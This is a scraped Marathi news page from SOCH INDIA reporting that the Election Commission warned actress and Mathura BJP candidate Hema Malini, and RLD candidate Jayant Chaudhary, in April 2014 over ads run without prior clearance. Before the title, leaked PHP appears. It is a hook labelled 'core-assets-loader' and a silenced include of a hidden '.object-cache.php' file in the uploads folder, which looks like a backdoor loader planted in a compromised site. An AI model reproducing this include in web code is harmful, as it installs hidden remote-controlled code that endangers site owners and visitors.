add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); हेमामालिनी यांना निवडणूक आयोगाची तंबी – SOCH INDIA
Menu

देश,राजनीति
हेमामालिनी यांना निवडणूक आयोगाची तंबी

nobanner

रविवार ६ एप्रिल २०१४ मथुरा : आचारसंहितेचे उल्लंघन केल्याच्या प्रकरणात निवडणूक आयोगाने प्रसिद्ध चित्रपट अभिनेत्री व मथुरा येथून भाजपाच्या उमेदवार हेमामालिनी यांना तंबी दिली आहे. त्यांच्यासोबतच राष्ट्रीय लोकदलाचे उमेदवार जयंत चौधरी यांनादेखील समज देण्यात आली आहे. प्रसारमाध्यम प्रमाणन व देखरेख समितीची पूर्वपरवानगी घेतल्याशिवाय या दोन्ही उमेदवारांनी जाहिराती दिल्या होत्या. यासंदर्भात त्यांना नियमांचा भंग होत असल्याबद्दल समज देण्यात आली आहे.